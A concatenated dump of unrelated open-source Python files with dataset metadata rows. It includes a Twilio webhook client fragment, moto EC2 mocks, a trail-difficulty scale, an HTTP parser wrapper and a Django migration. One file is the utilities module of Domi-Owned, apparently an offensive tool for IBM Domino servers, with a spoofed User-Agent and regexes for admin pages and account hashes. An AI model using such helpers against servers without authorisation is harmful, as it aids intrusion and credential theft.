with the most efficient page size, i.e. min(limit, 1000)
:returns: Generator that will yield up to limit results
:rtype: list[twilio.rest.autopilot.v1.assistant.webhook.WebhookInstance]
"""
return list(self.stream(limit=limit, page_size=page_size, ))
def page(self, page_token=values.unset, page_number=values.unset,
page_size=values.unset):
"""
Retrieve a single page of WebhookInstance records from the API.
Request is executed immediately
:param str page_token: PageToken provided by the API
:param int page_number: Page Number, this value is simply for client state
:param int page_size: Number of records to return, defaults to 50
:returns: Page of WebhookInstance
:rtype: twilio.rest.autopilot.v1.assistant.webhook.WebhookPage
"""
data = values.of({'PageToken': page_token, 'Page': page_number, 'PageSize': page_size, })
response = self._version.page(method='GET', uri=self._uri, params=data, )
return WebhookPage(self._version, response, self._solution)
def get_page(self, target_url):
"""
Retrieve a specific page of WebhookInstance records from the API.
Request is executed immediately
:param str target_url: API-generated URL for the requested results page
:returns: Page of WebhookInstance
:rtype: twilio.rest.autopilot.v1.assistant.webhook.WebhookPage
"""
response = self._version.domain.twilio.request(
'GET',
target_url,
)
return WebhookPage(self._version, response, self._solution)
def create(self, unique_name, events, webhook_url, webhook_method=values.unset):
"""
Create the WebhookInstance
:param unicode unique_name: An application-defined string that uniquely identifies the resource
:param unicode events: The list of space-separated events that this Webhook will subscribe to.
:param unicode webhook_url: The URL associated with this Webhook.
:param unicode webhook_method: The method to be used when calling the webhook's URL.
:returns: The created WebhookInstance
:rtype: twilio.rest.autopilot.v1.assistant.webhook.WebhookInstance
"""
data = values.of({
'UniqueName': unique_name,
'Events': events,
'WebhookUrl': webhook_url,
'WebhookMethod': webhook_method,
})
payload = self._version.create(method='POST', uri=self._uri, data=data, )
return WebhookInstance(self._version, payload, assistant_sid=self._solution['assistant_sid'], )
def get(self, sid):
"""
Constructs a WebhookContext
:param sid: The unique string that identifies the resource to fetch
:returns: twilio.rest.autopilot.v1.assistant.webhook.WebhookContext
:rtype: twilio.rest.autopilot.v1.assistant.webhook.WebhookContext
"""
return WebhookContext(self._version, assistant_sid=self._solution['assistant_sid'], sid=sid, )
def __call__(self, sid):
"""
Constructs a WebhookContext
:param sid: The unique string that identifies the resource to fetch
:returns: twilio.rest.autopilot.v1.assistant.webhook.WebhookContext
:rtype: twilio.rest.autopilot.v1.assistant.webhook.WebhookContext
"""
return WebhookContext(self._version, assistant_sid=self._solution['assistant_sid'], sid=sid, )
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
return '<Twilio.Autopilot.V1.WebhookList>'
class WebhookPage(Page):
""" PLEASE NOTE that this class contains preview products that are subject
to change. Use them with caution. If you currently do not have developer
preview access, please contact [email protected]. """
def __init__(self, version, response, solution):
"""
Initialize the WebhookPage
:param Version version: Version that contains the resource
:param Response response: Response from the API
:param assistant_sid: The SID of the Assistant that is the parent of the resource
:returns: twilio.rest.autopilot.v1.assistant.webhook.WebhookPage
:rtype: twilio.rest.autopilot.v1.assistant.webhook.WebhookPage
"""
super(WebhookPage, self).__init__(version, response)
# Path Solution
self._solution = solution
def get_instance(self, payload):
"""
Build an instance of WebhookInstance
:param dict payload: Payload response from the API
:returns: twilio.rest.autopilot.v1.assistant.webhook.WebhookInstance
:rtype: twilio.rest.autopilot.v1.assistant.webhook.WebhookInstance
"""
return WebhookInstance(self._version, payload, assistant_sid=self._solution['assistant_sid'], )
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
return '<Twilio.Autopilot.V1.WebhookPage>'
class WebhookContext(InstanceContext):
""" PLEASE NOTE that this class contains preview products that are subject
to change. Use them with caution. If you currently do not have developer
preview access, please contact [email protected]. """
def __init__(self, version, assistant_sid, sid):
"""
Initialize the WebhookContext
:param Version version: Version that contains the resource
:param assistant_sid: The SID of the Assistant that is the parent of the resource to fetch
:param sid: The unique string that identifies the resource to fetch
:returns: twilio.rest.autopilot.v1.assistant.webhook.WebhookContext
:rtype: twilio.rest.autopilot.v1.assistant.webhook.WebhookContext
"""
super(WebhookContext, self).__init__(version)
# Path Solution
self._solution = {'assistant_sid': assistant_sid, 'sid': sid, }
self._uri = '/Assistants/{assistant_sid}/Webhooks/{sid}'.format(**self._solution)
def fetch(self):
"""
Fetch the WebhookInstance
:returns: The fetched WebhookInstance
:rtype: twilio.rest.autopilot.v1.assistant.webhook.WebhookInstance
"""
payload = self._version.fetch(method='GET', uri=self._uri, )
return WebhookInstance(
self._version,
payload,
assistant_sid=self._solution['assistant_sid'],
sid=self._solution['sid'],
)
def update(self, unique_name=values.unset, events=values.unset,
webhook_url=values.unset, webhook_method=values.unset):
"""
Update the WebhookInstance
:param unicode unique_name: An application-defined string that uniquely identifies the resource
:param unicode events: The list of space-separated events that this Webhook will subscribe to.
:param unicode webhook_url: The URL associated with this Webhook.
:param unicode webhook_method: The method to be used when calling the webhook's URL.
:returns: The updated WebhookInstance
:rtype: twilio.rest.autopilot.v1.assistant.webhook.WebhookInstance
"""
data = values.of({
'UniqueName': unique_name,
'Events': events,
'WebhookUrl': webhook_url,
'WebhookMethod': webhook_method,
})
payload = self._version.update(method='POST', uri=self._uri, data=data, )
return WebhookInstance(
self._version,
payload,
assistant_sid=self._solution['assistant_sid'],
sid=self._solution['sid'],
)
def delete(self):
"""
Deletes the WebhookInstance
:returns: True if delete succeeds, False otherwise
:rtype: bool
"""
return self._version.delete(method='DELETE', uri=self._uri, )
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
context = ' '.join('{}={}'.format(k, v) for k, v in self._solution.items())
return '<Twilio.Autopilot.V1.WebhookContext {}>'.format(context)
class WebhookInstance(InstanceResource):
""" PLEASE NOTE that this class contains preview products that are subject
to change. Use them with caution. If you currently do not have developer
preview access, please contact [email protected]. """
def __init__(self, version, payload, assistant_sid, sid=None):
"""
Initialize the WebhookInstance
:returns: twilio.rest.autopilot.v1.assistant.webhook.WebhookInstance
:rtype: twilio.rest.autopilot.v1.assistant.webhook.WebhookInstance
"""
super(WebhookInstance, self).__init__(version)
# Marshaled Properties
self._properties = {
'url': payload.get('url'),
'account_sid': payload.get('account_sid'),
'date_created': deserialize.iso8601_datetime(payload.get('date_created')),
'date_updated': deserialize.iso8601_datetime(payload.get('date_updated')),
'assistant_sid': payload.get('assistant_sid'),
'sid': payload.get('sid'),
'unique_name': payload.get('unique_name'),
'events': payload.get('events'),
'webhook_url': payload.get('webhook_url'),
'webhook_method': payload.get('webhook_method'),
}
# Context
self._context = None
self._solution = {'assistant_sid': assistant_sid, 'sid': sid or self._properties['sid'], }
@property
def _proxy(self):
"""
Generate an instance context for the instance, the context is capable of
performing various actions. All instance actions are proxied to the context
:returns: WebhookContext for this WebhookInstance
:rtype: twilio.rest.autopilot.v1.assistant.webhook.WebhookContext
"""
if self._context is None:
self._context = WebhookContext(
self._version,
assistant_sid=self._solution['assistant_sid'],
sid=self._solution['sid'],
)
return self._context
@property
def url(self):
"""
:returns: The absolute URL of the Webhook resource
:rtype: unicode
"""
return self._properties['url']
@property
def account_sid(self):
"""
:returns: The SID of the Account that created the resource
:rtype: unicode
"""
return self._properties['account_sid']
@property
def date_created(self):
"""
:returns: The RFC 2822 date and time in GMT when the resource was created
:rtype: datetime
"""
return self._properties['date_created']
@property
def date_updated(self):
"""
:returns: The RFC 2822 date and time in GMT when the resource was last updated
:rtype: datetime
"""
return self._properties['date_updated']
@property
def assistant_sid(self):
"""
:returns: The SID of the Assistant that is the parent of the resource
:rtype: unicode
"""
return self._properties['assistant_sid']
@property
def sid(self):
"""
:returns: The unique string that identifies the resource
:rtype: unicode
"""
return self._properties['sid']
@property
def unique_name(self):
"""
:returns: An application-defined string that uniquely identifies the resource
:rtype: unicode
"""
return self._properties['unique_name']
@property
def events(self):
"""
:returns: The list of space-separated events that this Webhook is subscribed to.
:rtype: unicode
"""
return self._properties['events']
@property
def webhook_url(self):
"""
:returns: The URL associated with this Webhook.
:rtype: unicode
"""
return self._properties['webhook_url']
@property
def webhook_method(self):
"""
:returns: The method used when calling the webhook's URL.
:rtype: unicode
"""
return self._properties['webhook_method']
def fetch(self):
"""
Fetch the WebhookInstance
:returns: The fetched WebhookInstance
:rtype: twilio.rest.autopilot.v1.assistant.webhook.WebhookInstance
"""
return self._proxy.fetch()
def update(self, unique_name=values.unset, events=values.unset,
webhook_url=values.unset, webhook_method=values.unset):
"""
Update the WebhookInstance
:param unicode unique_name: An application-defined string that uniquely identifies the resource
:param unicode events: The list of space-separated events that this Webhook will subscribe to.
:param unicode webhook_url: The URL associated with this Webhook.
:param unicode webhook_method: The method to be used when calling the webhook's URL.
:returns: The updated WebhookInstance
:rtype: twilio.rest.autopilot.v1.assistant.webhook.WebhookInstance
"""
return self._proxy.update(
unique_name=unique_name,
events=events,
webhook_url=webhook_url,
webhook_method=webhook_method,
)
def delete(self):
"""
Deletes the WebhookInstance
:returns: True if delete succeeds, False otherwise
:rtype: bool
"""
return self._proxy.delete()
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
context = ' '.join('{}={}'.format(k, v) for k, v in self._solution.items())
return '<Twilio.Autopilot.V1.WebhookInstance {}>'.format(context)
| mit | 3,099,753,894,173,314,600 | 35.510549 | 103 | 0.62747 | false | 4.336257 | false | false | false |
coldfusion39/domi-owned | domi_owned/utilities.py | 1 | 4849 | # Copyright (c) 2017, Brandan Geise [coldfusion]
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import logging.handlers
import re
import sys
import tqdm
class Utilities(object):
"""
Utility functions.
"""
HEADERS = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Connection': 'close'
}
URL_REGEX = re.compile(r'(https?:\/\/[\d\w.:-]+)', re.I)
FORM_REGEX = re.compile(r'method[\'\"= ]{1,4}post[\'\"]?', re.I)
OPEN_REGEX = re.compile(r'name[\'\"= ]{1,4}notesview[\'\"]?', re.I)
ACCOUNT_REGEX = re.compile(r'/([a-f0-9]{32}/[a-f0-9]{32})', re.I)
USER_FIELD_REGEX = re.compile(r'user.+', re.I)
REDIRECT_FIELD_REGEX = re.compile(r'redirect.+', re.I)
NAMES_REGEX = re.compile(r'name[\'\"= ]{1,4}notesview[\'\"]?', re.I)
WEBADMIN_REGEX = re.compile(r'<title>.*administration</title>', re.I)
RESTRICTED_REGEX = re.compile(r'(notes exception|not authorized)', re.I)
VERSION_REGEX = re.compile(r'(?:version|domino administrator|domino|release)[=":\s]{0,4}([\d.]+)(?:\s|\")?', re.I)
LINUX_USER_REGEX = re.compile(r'([a-z0-9-_].+):(.+)', re.I)
WINDOWS_USER_REGEX = re.compile(r'(.+)\\(.+)', re.I)
PATH_REGEX = re.compile(r'DataDirectory\s*=\s*\'(.+)\';', re.I)
def set_logging(self):
"""
Configure the basic logging environment for the application.
"""
logger = logging.getLogger('DomiOwned')
logger.setLevel(logging.DEBUG)
custom_format = CustomLoggingFormatter()
handler = logging.StreamHandler()
handler.setFormatter(custom_format)
logger.addHandler(handler)
return logger
def parse_credentials(self, value):
"""
Handle credentials if value is None.
"""
return '' if value is None else value
def check_url(self, url):
"""
Check for valid base URL.
"""
if self.URL_REGEX.search(url):
return self.URL_REGEX.search(url).group(1)
else:
self.logger.error('Invalid URL provided')
sys.exit()
def setup_progress(self, total):
"""
Setup progress bar.
"""
progress_bar = tqdm.tqdm(
total=total,
desc="Progress",
smoothing=0.5,
bar_format='{desc}{percentage:3.0f}%|{bar}|({n_fmt}/{total_fmt})|{elapsed} '
)
return progress_bar
class CustomLoggingFormatter(logging.Formatter):
"""
Custom logging formatter.
"""
DEBUG_FORMAT = "\033[1m\033[34m[*]\033[0m %(msg)s"
INFO_FORMAT = "\033[1m\033[32m[+]\033[0m %(msg)s"
WARN_FORMAT = "\033[1m\033[33m[!]\033[0m %(msg)s"
ERROR_FORMAT = "\033[1m\033[31m[-]\033[0m %(msg)s"
def __init__(self):
super().__init__(fmt="%(levelno)d: %(msg)s", datefmt=None, style='%')
def format(self, record):
orig_format = self._style._fmt
if record.levelno == logging.DEBUG:
self._style._fmt = CustomLoggingFormatter.DEBUG_FORMAT
elif record.levelno == logging.INFO:
self._style._fmt = CustomLoggingFormatter.INFO_FORMAT
elif record.levelno == logging.WARN:
self._style._fmt = CustomLoggingFormatter.WARN_FORMAT
elif record.levelno == logging.ERROR:
self._style._fmt = CustomLoggingFormatter.ERROR_FORMAT
result = logging.Formatter.format(self, record)
self._style._fmt = orig_format
return result
class Banner(object):
"""
Domi-Owned visual banner.
"""
SHOW = """
__________ __________ __________
| |\| | |\\
| * * ||| * * * | * ||
| * * ||| | * ||
| * * ||| * * * | * ||
|__________|||__________|__________||
| || `---------------------`
| * * ||
| ||
| * * ||
|__________||
`----------`
IBM/Lotus Domino OWNage
"""
| mit | -4,950,852,801,846,686,000 | 32.673611 | 133 | 0.621984 | false | 3.036318 | false | false | false |
ZuluPro/moto | moto/ec2/responses/vpc_peering_connections.py | 4 | 5068 | from __future__ import unicode_literals
from moto.core.responses import BaseResponse
class VPCPeeringConnections(BaseResponse):
def create_vpc_peering_connection(self):
vpc = self.ec2_backend.get_vpc(self._get_param('VpcId'))
peer_vpc = self.ec2_backend.get_vpc(self._get_param('PeerVpcId'))
vpc_pcx = self.ec2_backend.create_vpc_peering_connection(vpc, peer_vpc)
template = self.response_template(
CREATE_VPC_PEERING_CONNECTION_RESPONSE)
return template.render(vpc_pcx=vpc_pcx)
def delete_vpc_peering_connection(self):
vpc_pcx_id = self._get_param('VpcPeeringConnectionId')
vpc_pcx = self.ec2_backend.delete_vpc_peering_connection(vpc_pcx_id)
template = self.response_template(
DELETE_VPC_PEERING_CONNECTION_RESPONSE)
return template.render(vpc_pcx=vpc_pcx)
def describe_vpc_peering_connections(self):
vpc_pcxs = self.ec2_backend.get_all_vpc_peering_connections()
template = self.response_template(
DESCRIBE_VPC_PEERING_CONNECTIONS_RESPONSE)
return template.render(vpc_pcxs=vpc_pcxs)
def accept_vpc_peering_connection(self):
vpc_pcx_id = self._get_param('VpcPeeringConnectionId')
vpc_pcx = self.ec2_backend.accept_vpc_peering_connection(vpc_pcx_id)
template = self.response_template(
ACCEPT_VPC_PEERING_CONNECTION_RESPONSE)
return template.render(vpc_pcx=vpc_pcx)
def reject_vpc_peering_connection(self):
vpc_pcx_id = self._get_param('VpcPeeringConnectionId')
self.ec2_backend.reject_vpc_peering_connection(vpc_pcx_id)
template = self.response_template(
REJECT_VPC_PEERING_CONNECTION_RESPONSE)
return template.render()
CREATE_VPC_PEERING_CONNECTION_RESPONSE = """
<CreateVpcPeeringConnectionResponse xmlns="http://ec2.amazonaws.com/doc/2013-10-15/">
<requestId>7a62c49f-347e-4fc4-9331-6e8eEXAMPLE</requestId>
<vpcPeeringConnection>
<vpcPeeringConnectionId>{{ vpc_pcx.id }}</vpcPeeringConnectionId>
<requesterVpcInfo>
<ownerId>777788889999</ownerId>
<vpcId>{{ vpc_pcx.vpc.id }}</vpcId>
<cidrBlock>{{ vpc_pcx.vpc.cidr_block }}</cidrBlock>
</requesterVpcInfo>
<accepterVpcInfo>
<ownerId>123456789012</ownerId>
<vpcId>{{ vpc_pcx.peer_vpc.id }}</vpcId>
</accepterVpcInfo>
<status>
<code>initiating-request</code>
<message>Initiating request to {accepter ID}.</message>
</status>
<expirationTime>2014-02-18T14:37:25.000Z</expirationTime>
<tagSet/>
</vpcPeeringConnection>
</CreateVpcPeeringConnectionResponse>
"""
DESCRIBE_VPC_PEERING_CONNECTIONS_RESPONSE = """
<DescribeVpcPeeringConnectionsResponse xmlns="http://ec2.amazonaws.com/doc/2013-10-15/">
<requestId>7a62c49f-347e-4fc4-9331-6e8eEXAMPLE</requestId>
<vpcPeeringConnectionSet>
{% for vpc_pcx in vpc_pcxs %}
<item>
<vpcPeeringConnectionId>{{ vpc_pcx.id }}</vpcPeeringConnectionId>
<requesterVpcInfo>
<ownerId>777788889999</ownerId>
<vpcId>{{ vpc_pcx.vpc.id }}</vpcId>
<cidrBlock>{{ vpc_pcx.vpc.cidr_block }}</cidrBlock>
</requesterVpcInfo>
<accepterVpcInfo>
<ownerId>123456789012</ownerId>
<vpcId>{{ vpc_pcx.peer_vpc.id }}</vpcId>
</accepterVpcInfo>
<status>
<code>{{ vpc_pcx._status.code }}</code>
<message>{{ vpc_pcx._status.message }}</message>
</status>
<expirationTime>2014-02-17T16:00:50.000Z</expirationTime>
<tagSet/>
</item>
{% endfor %}
</vpcPeeringConnectionSet>
</DescribeVpcPeeringConnectionsResponse>
"""
DELETE_VPC_PEERING_CONNECTION_RESPONSE = """
<DeleteVpcPeeringConnectionResponse xmlns="http://ec2.amazonaws.com/doc/2013-10-15/">
<requestId>7a62c49f-347e-4fc4-9331-6e8eEXAMPLE</requestId>
<return>true</return>
</DeleteVpcPeeringConnectionResponse>
"""
ACCEPT_VPC_PEERING_CONNECTION_RESPONSE = """
<AcceptVpcPeeringConnectionResponse xmlns="http://ec2.amazonaws.com/doc/2013-10-15/">
<requestId>7a62c49f-347e-4fc4-9331-6e8eEXAMPLE</requestId>
<vpcPeeringConnection>
<vpcPeeringConnectionId>{{ vpc_pcx.id }}</vpcPeeringConnectionId>
<requesterVpcInfo>
<ownerId>123456789012</ownerId>
<vpcId>{{ vpc_pcx.vpc.id }}</vpcId>
<cidrBlock>{{ vpc_pcx.vpc.cidr_block }}</cidrBlock>
</requesterVpcInfo>
<accepterVpcInfo>
<ownerId>777788889999</ownerId>
<vpcId>{{ vpc_pcx.peer_vpc.id }}</vpcId>
<cidrBlock>{{ vpc_pcx.peer_vpc.cidr_block }}</cidrBlock>
</accepterVpcInfo>
<status>
<code>{{ vpc_pcx._status.code }}</code>
<message>{{ vpc_pcx._status.message }}</message>
</status>
<tagSet/>
</vpcPeeringConnection>
</AcceptVpcPeeringConnectionResponse>
"""
REJECT_VPC_PEERING_CONNECTION_RESPONSE = """
<RejectVpcPeeringConnectionResponse xmlns="http://ec2.amazonaws.com/doc/2013-10-15/">
<requestId>7a62c49f-347e-4fc4-9331-6e8eEXAMPLE</requestId>
<return>true</return>
</RejectVpcPeeringConnectionResponse>
"""
| apache-2.0 | -1,107,759,523,004,262,400 | 37.687023 | 88 | 0.681926 | false | 3.149782 | false | false | false |
schocco/mds-web | apps/muni_scales/mscale.py | 1 | 5171 | # -*- coding: utf-8 -*-
from django.utils.encoding import force_unicode
from django.utils.translation import ugettext_lazy as _
class Mscale(object):
"""
M scale, describing the difficultiy of a single muni trail section.
"""
levels = (0.0, 0.5, 1.0, 1.5, 2.0, 2.5, 3.0, 3.5, 4.0, 4.5, 5.0)
def __init__(self, *args, **kwargs):
"""
initial values can be provided via kwargs.
:param number: difficulty level, e.g. 2 for M2
:type number: int
:param underground: description of the trail underground
:type underground: str.
:param slope: slope
:param obstacles: list of obstacles
:type obstacles: list
:param characteristics: list of other characteristics
that describe the trail section
:type characteristics: list
"""
self.number = float(kwargs.pop(u"number", 0))
self.underground = kwargs.pop(u"underground", "")
self.slope = kwargs.pop(u"slope", "")
self.obstacles = kwargs.pop(u"obstacles", [])
self.characteristics = kwargs.pop(u"characteristics", [])
def __unicode__(self):
return force_unicode(u"M%s" % self.number or u'M')
def __str__(self):
return str(self.__unicode__())
def __eq__(self, other):
if isinstance(other, Mscale):
return self.number == other.number
elif isinstance(other, (int, float)):
return self.number == other
else:
return False
# raise TypeError(u"Cannot compare Mscale object with %s" % str(other))
def __ne__(self, other):
return not self.__eq__(other)
def __cmp__(self, other):
"""
Also allows comparisons between mscale instances and numbers.
"""
if (isinstance(other, Mscale)):
return cmp(self.number, other.number)
elif (isinstance(other, int) or isinstance(other, float)):
return cmp(self.number, other)
else:
raise TypeError(_(u"Cannot compare Mscale object with {0}").format(other))
def __hash__(self):
return hash(unicode(self))
MSCALES = {}
MSCALES[0] = Mscale(number=0.0,
underground=_(u"pavement or solid soil/compact gravel"),
slope="< 20 %",
obstacles=[_(u"no obstacles")],
characteristics=[_(u"90° turns within > 2 m and with slope < 10 %")]
)
MSCALES[0.5] = Mscale(number=0.5)
MSCALES[1] = Mscale(number=1.0,
underground=_(u"partly loose soil/gravel"),
slope="< 40 %",
obstacles=[_(u"small obstacles, approx. 5cm high (small stones, flat roots)"),
_(u"single 15 cm steps")],
characteristics=[_(u"90° turn within > 1 m and with slope < 20 %")]
)
MSCALES[1.5] = Mscale(number=1.5)
MSCALES[2] = Mscale(number=2.0,
underground=_(u"loose soil/gravel"),
slope="< 60 %",
obstacles=[_(u"obstacles, approx. 10 cm high (stones, roots"),
_(u"single 30 cm steps")
],
characteristics=[_(u"90° turn within > 0.5 m and with slope < 30 %")]
)
MSCALES[2.5] = Mscale(number=2.5)
MSCALES[3] = Mscale(number=3.0,
underground=_(u"loose soil with loose stones (size of few cm)"),
slope="< 80 %",
obstacles=[_(u"obstacles that are approx 20cm high (stones, roots)"),
_(u"several irregular steps, approx. 20 cm each"),
_(u"drops < 1 m"),
_(u"gaps < 0.5 m")],
characteristics=[_(u"135° turn within ~ 0.5 m and with slope < 40 %")]
)
MSCALES[3.5] = Mscale(number=3.5)
MSCALES[4] = Mscale(number=4.0,
underground=_(u"very loose/slippery soil with loose stones (size of several cm)"),
slope="< 100 %",
obstacles=[_(u"big obstacles (stones, logs ~ 30 cm)"),
_(u"several irregular steps ~ 30 cm each"),
_(u"drops < 1.5 m"),
_(u"gaps < 1 m")],
characteristics=[_(u"135° turn within ~ 0.5 m and with slope < 60 %")]
)
MSCALES[4.5] = Mscale(number=4.5)
MSCALES[5] = Mscale(number=5.0,
underground=_(u"very loose/slippery soil with loose stones (size of several cm)"),
slope="> 100 %",
obstacles=[_(u"very big obstacles (stones, logs ~ 40 cm)"),
_(u"several irregular steps ~ 40 cm each"),
_(u"drops > 1.5 m, gaps > 1 m")],
characteristics=[_(u"135° turn within ~ 0.5 m and with slope < 80 %")]
)
MSCALE_CHOICES = tuple((m, "M %s" % str(m).replace(".0", "")) for m in Mscale.levels)
| mit | -7,137,288,401,920,602,000 | 38.730769 | 102 | 0.500871 | false | 3.707825 | false | false | false |
Lukasa/pycohttpparser | src/pycohttpparser/api.py | 1 | 6580 | # -*- coding: utf-8 -*-
"""
pycohttpparser/api
~~~~~~~~~~~~~~~~~~
Defines the public API to pycohttpparser.
"""
from collections import namedtuple
from ._pycohttpparser import lib, ffi
Request = namedtuple(
'Request', ['method', 'path', 'minor_version', 'headers', 'consumed']
)
Response = namedtuple(
'Response', ['status', 'msg', 'minor_version', 'headers', 'consumed']
)
class ParseError(Exception):
"""
An invalid HTTP message was passed to the parser.
"""
class Parser(object):
"""
A single HTTP parser object. This object can parse HTTP requests and
responses using picohttpparser.
This object is not thread-safe, and it does maintain state that is shared
across parsing requests. For this reason, make sure that access to this
object is synchronized if you use it across multiple threads.
"""
def __init__(self):
# Store some instance variables. This represents essentially static
# allocations that are used repeatedly in some of the parsing code.
# This avoids the overhead of repeatedly allocating large chunks of
# memory each time a parse is called.
# Allocate all the data that will come out of the method.
self._method = self._msg = ffi.new("char **")
self._method_len = self._msg_len = ffi.new("size_t *")
self._path = ffi.new("char **")
self._path_len = ffi.new("size_t *")
self._minor_version = ffi.new("int *")
self._status = ffi.new("int *")
# Allow space for 1000 headers. Anything more is clearly nonsense.
self._header_count = 1000
self._headers = ffi.new("struct phr_header [1000]")
self._num_headers = ffi.new("size_t *", self._header_count)
def parse_request(self, buffer):
"""
Parses a single HTTP request from a buffer.
:param buffer: A ``memoryview`` object wrapping a buffer containing a
HTTP request.
:returns: A :class:`Request <pycohttpparser.api.Request>` object, or
``None`` if there is not enough data in the buffer.
"""
# Allocate function inputs
buffer_size = ffi.cast("size_t", len(buffer))
phr_buffer = ffi.new("char []", buffer.tobytes())
last_len = ffi.cast("size_t", 0)
# Reset the header count.
self._num_headers[0] = self._header_count
# Do the parse.
pret = lib.phr_parse_request(
phr_buffer,
buffer_size,
self._method,
self._method_len,
self._path,
self._path_len,
self._minor_version,
self._headers,
self._num_headers,
last_len
)
# Check for insufficient data or parse errors.
if pret == -2:
return None
elif pret == -1:
raise ParseError("Invalid message")
# If we got here we have a full request. We need to return useful
# data. A useful trick here: all the returned char pointers are
# pointers into buffer. This means we can use them as offsets and
# return memoryviews to their data. Snazzy, right?
method = b''
path = b''
minor_version = -1
offset = self._method[0] - phr_buffer
element_len = self._method_len[0]
method = buffer[offset:offset+element_len]
offset = self._path[0] - phr_buffer
element_len = self._path_len[0]
path = buffer[offset:offset+element_len]
minor_version = self._minor_version[0]
# We can create the Request object now, because all the scalar fields
# are ready. We can put the headers into a list already hung from it.
req = Request(method, path, minor_version, [], pret)
for header in self._build_headers(phr_buffer, buffer):
req.headers.append(header)
return req
def parse_response(self, buffer):
"""
Parses a single HTTP response from a buffer.
:param buffer: A ``memoryview`` object wrapping a buffer containing a
HTTP response.
:returns: A :class:`Response <pycohttpparser.api.Response>` object, or
``None`` if there is not enough data in the buffer.
"""
# Allocate function inputs
buffer_size = ffi.cast("size_t", len(buffer))
phr_buffer = ffi.new("char []", buffer.tobytes())
last_len = ffi.cast("size_t", 0)
# Reset the header count.
self._num_headers[0] = self._header_count
# Do the parse.
pret = lib.phr_parse_response(
phr_buffer,
buffer_size,
self._minor_version,
self._status,
self._msg,
self._msg_len,
self._headers,
self._num_headers,
last_len
)
# Check for insufficient data or parse errors.
if pret == -2:
return None
elif pret == -1:
raise ParseError("Invalid message")
# If we got here we have a full request. We need to return useful
# data. A useful trick here: all the returned char pointers are
# pointers into buffer. This means we can use them as offsets and
# return memoryviews to their data. Snazzy, right?
msg = b''
status = 0
minor_version = -1
status = self._status[0]
offset = self._msg[0] - phr_buffer
element_len = self._msg_len[0]
msg = buffer[offset:offset+element_len]
minor_version = self._minor_version[0]
# We can create the Request object now, because all the scalar fields
# are ready. We can put the headers into a list already hung from it.
req = Response(status, msg, minor_version, [], pret)
for header in self._build_headers(phr_buffer, buffer):
req.headers.append(header)
return req
def _build_headers(self, phr_buffer, orig_buffer):
"""
Called by a parsing routine to build a collection of header names and
values.
"""
for index in range(self._num_headers[0]):
header_struct = self._headers[index]
name_index = header_struct.name - phr_buffer
value_index = header_struct.value - phr_buffer
name_len = header_struct.name_len
value_len = header_struct.value_len
name = orig_buffer[name_index:name_index+name_len]
value = orig_buffer[value_index:value_index+value_len]
yield (name, value)
| mit | -4,779,798,032,722,320,000 | 32.74359 | 78 | 0.587082 | false | 4.086957 | false | false | false |
kajala/citizenmatch-backend | users/migrations/0001_initial.py | 1 | 2727 | # -*- coding: utf-8 -*-
# Generated by Django 1.9.2 on 2016-02-28 20:35
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('auth', '0007_alter_validators_add_error_messages'),
('environment', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Language',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(db_index=True, max_length=64, unique=True)),
],
),
migrations.CreateModel(
name='LanguageSkill',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('level', models.SmallIntegerField(choices=[(1, 'Basics'), (2, 'Intermediate'), (3, 'Fluent'), (4, 'Native')])),
('language', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='users.Language')),
],
),
migrations.CreateModel(
name='UserProfile',
fields=[
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, primary_key=True, related_name='profile', serialize=False, to=settings.AUTH_USER_MODEL)),
('role', models.CharField(choices=[('A', 'Admin'), ('R', 'Refugee'), ('M', 'Mentor')], db_index=True, max_length=1)),
('phone', models.CharField(blank=True, db_index=True, default='', max_length=32)),
('birth_year', models.IntegerField()),
('gender', models.CharField(choices=[('M', 'Male'), ('F', 'Female')], max_length=1)),
('created', models.DateTimeField(blank=True, db_index=True, default=django.utils.timezone.now, editable=False)),
('last_modified', models.DateTimeField(auto_now=True, db_index=True)),
('city', models.ForeignKey(default=None, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='environment.City')),
],
options={
'verbose_name': 'User profile',
'verbose_name_plural': 'User profiles',
},
),
migrations.AddField(
model_name='languageskill',
name='user',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
]
| mit | -8,973,948,334,469,795,000 | 45.220339 | 180 | 0.585992 | false | 4.082335 | false | false | false |
